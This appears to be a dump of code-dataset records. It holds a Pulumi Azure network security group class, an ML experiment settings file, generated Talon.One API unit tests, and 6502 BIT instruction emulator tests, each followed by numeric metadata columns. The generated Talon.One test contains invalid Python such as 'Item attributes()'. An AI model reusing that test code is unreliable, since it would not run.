__props__ = NetworkSecurityGroupArgs.__new__(NetworkSecurityGroupArgs)
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["security_rules"] = security_rules
__props__.__dict__["tags"] = tags
super(NetworkSecurityGroup, __self__).__init__(
'azure:network/networkSecurityGroup:NetworkSecurityGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
security_rules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'NetworkSecurityGroup':
"""
Get an existing NetworkSecurityGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the security rule.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSecurityGroupSecurityRuleArgs']]]] security_rules: A list of objects representing security rules, as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NetworkSecurityGroupState.__new__(_NetworkSecurityGroupState)
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["security_rules"] = security_rules
__props__.__dict__["tags"] = tags
return NetworkSecurityGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the security rule.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the network security group. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> pulumi.Output[Sequence['outputs.NetworkSecurityGroupSecurityRule']]:
"""
A list of objects representing security rules, as defined below.
"""
return pulumi.get(self, "security_rules")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 47.773494
| 229
| 0.666499
| 2,248
| 19,826
| 5.698843
| 0.100089
| 0.081571
| 0.059012
| 0.041215
| 0.846928
| 0.834439
| 0.827492
| 0.817657
| 0.807431
| 0.800952
| 0
| 0.00538
| 0.240593
| 19,826
| 414
| 230
| 47.888889
| 0.84551
| 0.41834
| 0
| 0.731707
| 1
| 0
| 0.117795
| 0.044874
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156098
| false
| 0.004878
| 0.034146
| 0
| 0.282927
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c4b89e9cb24c513919fd8f676dd769e4e38c37ed
| 2,240
|
py
|
Python
|
Settings/set1-test_of_models_against_datasets/models_30m_640px.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
Settings/set1-test_of_models_against_datasets/models_30m_640px.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
Settings/set1-test_of_models_against_datasets/models_30m_640px.py
|
previtus/MGR-Project-Code
|
1126215059eb3f731dcf78ec24d9a480e73abce6
|
[
"MIT"
] | null | null | null |
def Setup(Settings,DefaultModel):
# set1-test_of_models_against_datasets/models_30m_640px.py
Settings["experiment_name"] = "set1c_Models_Test_30m_640px"
Settings["graph_histories"] = ['together', [0,1], [1,2], [0,2]]
n=0
# 5556x_minlen30_640px 5556x_minlen20_640px 5556x_reslen20_299px 5556x_reslen30_299px
Settings["models"][n]["dataset_name"] = "5556x_minlen30_640px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 640
Settings["models"][n]["model_type"] = 'img_osm_mix'
Settings["models"][n]["unique_id"] = 'mix'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
# c
Settings["models"][n]["loss_func"] = 'mean_absolute_error'
Settings["models"][n]["metrics"] = ['mean_squared_error']
Settings["models"].append(DefaultModel.copy())
n=1
Settings["models"][n]["dataset_pointer"] = -1 # 0 - reuse the first dataset
Settings["models"][n]["dataset_name"] = "5556x_minlen30_640px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 640
Settings["models"][n]["model_type"] = 'osm_only'
Settings["models"][n]["unique_id"] = 'osm_only'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
# c
Settings["models"][n]["loss_func"] = 'mean_absolute_error'
Settings["models"][n]["metrics"] = ['mean_squared_error']
Settings["models"].append(DefaultModel.copy())
n=2
Settings["models"][n]["dataset_pointer"] = -1 # 0 - reuse the first dataset
Settings["models"][n]["dataset_name"] = "5556x_minlen30_640px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 640
Settings["models"][n]["model_type"] = 'simple_cnn_with_top'
Settings["models"][n]["unique_id"] = 'img_only'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
# c
Settings["models"][n]["loss_func"] = 'mean_absolute_error'
Settings["models"][n]["metrics"] = ['mean_squared_error']
return Settings
| 41.481481
| 89
| 0.668304
| 287
| 2,240
| 4.923345
| 0.247387
| 0.307148
| 0.307856
| 0.077849
| 0.803963
| 0.748054
| 0.748054
| 0.748054
| 0.748054
| 0.748054
| 0
| 0.062694
| 0.138393
| 2,240
| 53
| 90
| 42.264151
| 0.66943
| 0.090179
| 0
| 0.657895
| 0
| 0
| 0.447291
| 0.06798
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026316
| false
| 0
| 0
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1efad1a35e93faacafc9b02795eac73c00071c63
| 68
|
py
|
Python
|
bugtests/test341c1.py
|
jeff5/jython-whinchat
|
65d8e5268189f8197295ff2d91be3decb1ee0081
|
[
"CNRI-Jython"
] | 577
|
2020-06-04T16:34:44.000Z
|
2022-03-31T11:46:07.000Z
|
bugtests/test341c1.py
|
jeff5/jython-whinchat
|
65d8e5268189f8197295ff2d91be3decb1ee0081
|
[
"CNRI-Jython"
] | 174
|
2015-01-08T20:37:09.000Z
|
2020-06-03T16:48:59.000Z
|
bugtests/test341c1.py
|
jeff5/jython-whinchat
|
65d8e5268189f8197295ff2d91be3decb1ee0081
|
[
"CNRI-Jython"
] | 162
|
2015-02-07T02:14:38.000Z
|
2020-05-30T16:42:03.000Z
|
from test341c2 import test341c2
class bar(test341c2):
pass
| 8.5
| 32
| 0.720588
| 8
| 68
| 6.125
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0.235294
| 68
| 7
| 33
| 9.714286
| 0.711538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
4805a1942f326fefbec9f682bcb72ec1354e6d81
| 13,365
|
py
|
Python
|
test/test_integration_state.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2021-03-05T06:41:26.000Z
|
2021-03-05T06:41:26.000Z
|
test/test_integration_state.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2021-09-07T08:56:58.000Z
|
2021-09-07T08:56:58.000Z
|
test/test_integration_state.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2019-05-21T10:27:54.000Z
|
2019-05-21T10:27:54.000Z
|
# coding: utf-8
"""
Talon.One API
The Talon.One API is used to manage applications and campaigns, as well as to integrate with your application. The operations in the _Integration API_ section are used to integrate with our platform, while the other operations are used to manage applications and campaigns. ### Where is the API? The API is available at the same hostname as these docs. For example, if you are reading this page at `https://mycompany.talon.one/docs/api/`, the URL for the [updateCustomerProfile][] operation is `https://mycompany.talon.one/v1/customer_profiles/id` [updateCustomerProfile]: #operation--v1-customer_profiles--integrationId--put # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import talon_one
from talon_one.models.integration_state import IntegrationState # noqa: E501
from talon_one.rest import ApiException
class TestIntegrationState(unittest.TestCase):
"""IntegrationState unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test IntegrationState
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = talon_one.models.integration_state.IntegrationState() # noqa: E501
if include_optional :
return IntegrationState(
session = talon_one.models.customer_session.CustomerSession(
integration_id = '0',
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
application_id = 56,
profile_id = '0',
coupon = '0',
referral = '0',
state = 'open',
cart_items = [
talon_one.models.cart_item.CartItem(
name = '0',
sku = '0',
quantity = 1,
price = 1.337,
category = '0',
weight = 1.337,
height = 1.337,
width = 1.337,
length = 1.337,
position = 1.337,
attributes = talon_one.models.item_attributes.Item attributes(), )
],
identifiers = [
'0'
],
total = 1.337,
attributes = talon_one.models.attributes.attributes(),
first_session = True,
discounts = {
'key' : 1.337
}, ),
profile = talon_one.models.customer_profile.CustomerProfile(
integration_id = '0',
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
attributes = talon_one.models.attributes.attributes(),
account_id = 56,
closed_sessions = 56,
total_sales = 1.337,
loyalty_memberships = [
talon_one.models.loyalty_membership.LoyaltyMembership(
joined = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
loyalty_program_id = 56, )
],
audience_memberships = [
talon_one.models.audience_membership.AudienceMembership(
id = 56,
name = '0', )
],
last_activity = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'), ),
event = talon_one.models.event.Event(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
application_id = 56,
profile_id = '0',
type = '0',
attributes = talon_one.models.attributes.attributes(),
session_id = '0',
effects = [
None
],
ledger_entries = [
talon_one.models.ledger_entry.LedgerEntry(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
profile_id = '0',
account_id = 56,
loyalty_program_id = 56,
event_id = 56,
amount = 56,
reason = '0',
expiry_date = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
reference_id = 56, )
],
meta = talon_one.models.meta.Meta(
campaigns = talon_one.models.campaigns.campaigns(),
coupons = talon_one.models.coupons.coupons(),
coupon_rejection_reason = talon_one.models.coupon_rejection_reason.CouponRejectionReason(
campaign_id = 56,
coupon_id = 56,
reason = 'CouponNotFound', ),
referral_rejection_reason = talon_one.models.referral_rejection_reason.ReferralRejectionReason(
campaign_id = 56,
referral_id = 56,
reason = 'ReferralNotFound', ),
warnings = talon_one.models.warnings.warnings(), ), ),
loyalty = talon_one.models.loyalty.Loyalty(
programs = {
'key' : talon_one.models.loyalty_program_ledgers.LoyaltyProgramLedgers(
id = 56,
title = '0',
name = '0',
ledger = talon_one.models.loyalty_program_balance.LoyaltyProgramBalance(
current_balance = 1.337,
pending_balance = 1.337,
expired_balance = 1.337,
spent_balance = 1.337,
tentative_current_balance = 1.337, ),
sub_ledgers = {
'key' : talon_one.models.loyalty_program_balance.LoyaltyProgramBalance(
current_balance = 1.337,
pending_balance = 1.337,
expired_balance = 1.337,
spent_balance = 1.337,
tentative_current_balance = 1.337, )
}, )
}, ),
coupon = talon_one.models.coupon.Coupon(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
campaign_id = 56,
value = '0123',
usage_limit = 0,
discount_limit = 0,
start_date = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
expiry_date = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
usage_counter = 56,
discount_counter = 1.337,
discount_remainder = 1.337,
attributes = talon_one.models.attributes_of_coupon.Attributes of coupon(),
referral_id = 56,
recipient_integration_id = '0',
import_id = 56,
reservation = True,
batch_id = '0', )
)
else :
return IntegrationState(
session = talon_one.models.customer_session.CustomerSession(
integration_id = '0',
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
application_id = 56,
profile_id = '0',
coupon = '0',
referral = '0',
state = 'open',
cart_items = [
talon_one.models.cart_item.CartItem(
name = '0',
sku = '0',
quantity = 1,
price = 1.337,
category = '0',
weight = 1.337,
height = 1.337,
width = 1.337,
length = 1.337,
position = 1.337,
attributes = talon_one.models.item_attributes.Item attributes(), )
],
identifiers = [
'0'
],
total = 1.337,
attributes = talon_one.models.attributes.attributes(),
first_session = True,
discounts = {
'key' : 1.337
}, ),
profile = talon_one.models.customer_profile.CustomerProfile(
integration_id = '0',
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
attributes = talon_one.models.attributes.attributes(),
account_id = 56,
closed_sessions = 56,
total_sales = 1.337,
loyalty_memberships = [
talon_one.models.loyalty_membership.LoyaltyMembership(
joined = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
loyalty_program_id = 56, )
],
audience_memberships = [
talon_one.models.audience_membership.AudienceMembership(
id = 56,
name = '0', )
],
last_activity = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'), ),
event = talon_one.models.event.Event(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
application_id = 56,
profile_id = '0',
type = '0',
attributes = talon_one.models.attributes.attributes(),
session_id = '0',
effects = [
None
],
ledger_entries = [
talon_one.models.ledger_entry.LedgerEntry(
id = 56,
created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
profile_id = '0',
account_id = 56,
loyalty_program_id = 56,
event_id = 56,
amount = 56,
reason = '0',
expiry_date = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
reference_id = 56, )
],
meta = talon_one.models.meta.Meta(
campaigns = talon_one.models.campaigns.campaigns(),
coupons = talon_one.models.coupons.coupons(),
coupon_rejection_reason = talon_one.models.coupon_rejection_reason.CouponRejectionReason(
campaign_id = 56,
coupon_id = 56,
reason = 'CouponNotFound', ),
referral_rejection_reason = talon_one.models.referral_rejection_reason.ReferralRejectionReason(
campaign_id = 56,
referral_id = 56,
reason = 'ReferralNotFound', ),
warnings = talon_one.models.warnings.warnings(), ), ),
)
def testIntegrationState(self):
"""Test IntegrationState"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 51.206897
| 647
| 0.438459
| 1,184
| 13,365
| 4.782095
| 0.178209
| 0.067821
| 0.10385
| 0.084069
| 0.749912
| 0.728365
| 0.709643
| 0.702932
| 0.702932
| 0.702932
| 0
| 0.073945
| 0.464721
| 13,365
| 260
| 648
| 51.403846
| 0.717501
| 0.007407
| 0
| 0.818966
| 0
| 0
| 0.068689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.008621
| 0.030172
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
481ea07cd917f474a27381b5979b9b17f52dae20
| 11,050
|
py
|
Python
|
tests/cpu/instruction/test_bitey_cpu_instruction_bit.py
|
jgerrish/bitey
|
a393a83c19338d94116f3405f4b8a0f03ea84d79
|
[
"MIT"
] | null | null | null |
tests/cpu/instruction/test_bitey_cpu_instruction_bit.py
|
jgerrish/bitey
|
a393a83c19338d94116f3405f4b8a0f03ea84d79
|
[
"MIT"
] | null | null | null |
tests/cpu/instruction/test_bitey_cpu_instruction_bit.py
|
jgerrish/bitey
|
a393a83c19338d94116f3405f4b8a0f03ea84d79
|
[
"MIT"
] | null | null | null |
import pytest
import tests.computer.computer
import tests.memory.memory
# TODO Maybe refactor so these are not needed
from bitey.cpu.addressing_mode import AbsoluteAddressingMode, ZeroPageAddressingMode
from bitey.cpu.instruction.opcode import Opcode
from bitey.cpu.instruction.bit import BIT
# module scope means run once per test module
@pytest.fixture(scope="module")
def setup():
computer = tests.computer.computer.init_computer()
yield computer
def test_cpu_instruction_bit_zeropage(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x21)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0x3C)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", False), ("N", False)], []
)
assert i1.result == 0x20
def test_cpu_instruction_bit_zeropage_negative_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x61)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0x9D)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", False), ("N", True)], []
)
assert i1.result == 0x01
def test_cpu_instruction_bit_zeropage_overflow_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x9D)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0x61)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", True), ("N", False)], []
)
assert i1.result == 0x01
def test_cpu_instruction_bit_zeropage_overflow_and_negative_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x9D)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0xE1)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", True), ("N", True)], []
)
assert i1.result == 0x81
def test_cpu_instruction_bit_zeropage_zero_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x1C)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0x21)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", True), ("V", False), ("N", False)], []
)
assert i1.result == 0x00
def test_cpu_instruction_bit_zeropage_zero_and_negative_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x61)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0x9C)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", True), ("V", False), ("N", True)], []
)
assert i1.result == 0x00
def test_cpu_instruction_bit_zeropage_zero_and_overflow_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x9C)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0x61)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", True), ("V", True), ("N", False)], []
)
assert i1.result == 0x00
def test_cpu_instruction_bit_zeropage_zero_and_overflow_and_negative_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x1C)
# The zero page location to read the value from
computer.memory.write(0x00, 0x01)
# The value
computer.memory.write(0x01, 0xE1)
i1_opcode = Opcode(0x24, ZeroPageAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", True), ("V", True), ("N", True)], []
)
assert i1.result == 0x00
def test_cpu_instruction_bit_absolute(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x21)
# The memory location to read the value from
computer.memory.write(0x00, 0x02)
computer.memory.write(0x01, 0x00)
# The value
computer.memory.write(0x02, 0x3C)
i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", False), ("N", False)], []
)
assert i1.result == 0x20
def test_cpu_instruction_bit_absolute_negative_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x61)
# The memory location to read the value from
computer.memory.write(0x00, 0x02)
computer.memory.write(0x01, 0x00)
# The value
computer.memory.write(0x02, 0x9D)
i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", False), ("N", True)], []
)
assert i1.result == 0x01
def test_cpu_instruction_bit_absolute_overflow_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x9D)
# The memory location to read the value from
computer.memory.write(0x00, 0x02)
computer.memory.write(0x01, 0x00)
# The value
computer.memory.write(0x02, 0x61)
i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", True), ("N", False)], []
)
assert i1.result == 0x01
def test_cpu_instruction_bit_absolute_overflow_and_negative_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x9D)
# The memory location to read the value from
computer.memory.write(0x00, 0x02)
computer.memory.write(0x01, 0x00)
# The value
computer.memory.write(0x02, 0xE1)
i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", False), ("V", True), ("N", True)], []
)
assert i1.result == 0x81
def test_cpu_instruction_bit_absolute_zero_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x1C)
# The memory location to read the value from
computer.memory.write(0x00, 0x02)
computer.memory.write(0x01, 0x00)
# The value
computer.memory.write(0x02, 0x21)
i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", True), ("V", False), ("N", False)], []
)
assert i1.result == 0x00
def test_cpu_instruction_bit_absolute_zero_and_negative_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x61)
# The memory location to read the value from
computer.memory.write(0x00, 0x02)
computer.memory.write(0x01, 0x00)
# The value
computer.memory.write(0x02, 0x9C)
i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", True), ("V", False), ("N", True)], []
)
assert i1.result == 0x00
def test_cpu_instruction_bit_absolute_zero_and_overflow_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x9C)
# The memory location to read the value from
computer.memory.write(0x00, 0x02)
computer.memory.write(0x01, 0x00)
# The value
computer.memory.write(0x02, 0x61)
i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", True), ("V", True), ("N", False)], []
)
assert i1.result == 0x00
def test_cpu_instruction_bit_absolute_zero_and_overflow_and_negative_flag(setup):
computer = setup
computer.reset()
computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x1C)
# The memory location to read the value from
computer.memory.write(0x00, 0x02)
computer.memory.write(0x01, 0x00)
# The value
computer.memory.write(0x02, 0xE1)
i1_opcode = Opcode(0x2C, AbsoluteAddressingMode())
i1 = BIT("BIT", i1_opcode, "Test Bits in Memory with Accumulator")
tests.computer.computer.execute_explicit_instruction(
computer, i1_opcode, i1, [], [("Z", True), ("V", True), ("N", True)], []
)
assert i1.result == 0x00
| 28.851175
| 84
| 0.678733
| 1,422
| 11,050
| 5.137834
| 0.057665
| 0.05256
| 0.104024
| 0.04599
| 0.944703
| 0.944703
| 0.938133
| 0.935943
| 0.935943
| 0.935943
| 0
| 0.055685
| 0.187421
| 11,050
| 382
| 85
| 28.926702
| 0.757991
| 0.086787
| 0
| 0.778761
| 0
| 0
| 0.072196
| 0
| 0
| 0
| 0.057279
| 0.002618
| 0.070796
| 1
| 0.075221
| false
| 0
| 0.026549
| 0
| 0.10177
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
483564b423122878993a9d78643a928c93edb783
| 15,415
|
py
|
Python
|
tests/src/main/python/rest/tests/extract/swagger_client/api/status_api.py
|
IBM/quality-measure-and-cohort-service
|
8963227bf4941d6a5fdc641b37ca0f72da5a6f2b
|
[
"Apache-2.0"
] | 1
|
2020-10-05T15:10:03.000Z
|
2020-10-05T15:10:03.000Z
|
tests/src/main/python/rest/tests/extract/swagger_client/api/status_api.py
|
IBM/quality-measure-and-cohort-service
|
8963227bf4941d6a5fdc641b37ca0f72da5a6f2b
|
[
"Apache-2.0"
] | null | null | null |
tests/src/main/python/rest/tests/extract/swagger_client/api/status_api.py
|
IBM/quality-measure-and-cohort-service
|
8963227bf4941d6a5fdc641b37ca0f72da5a6f2b
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
IBM Cohort Engine
Service to evaluate cohorts and measures # noqa: E501
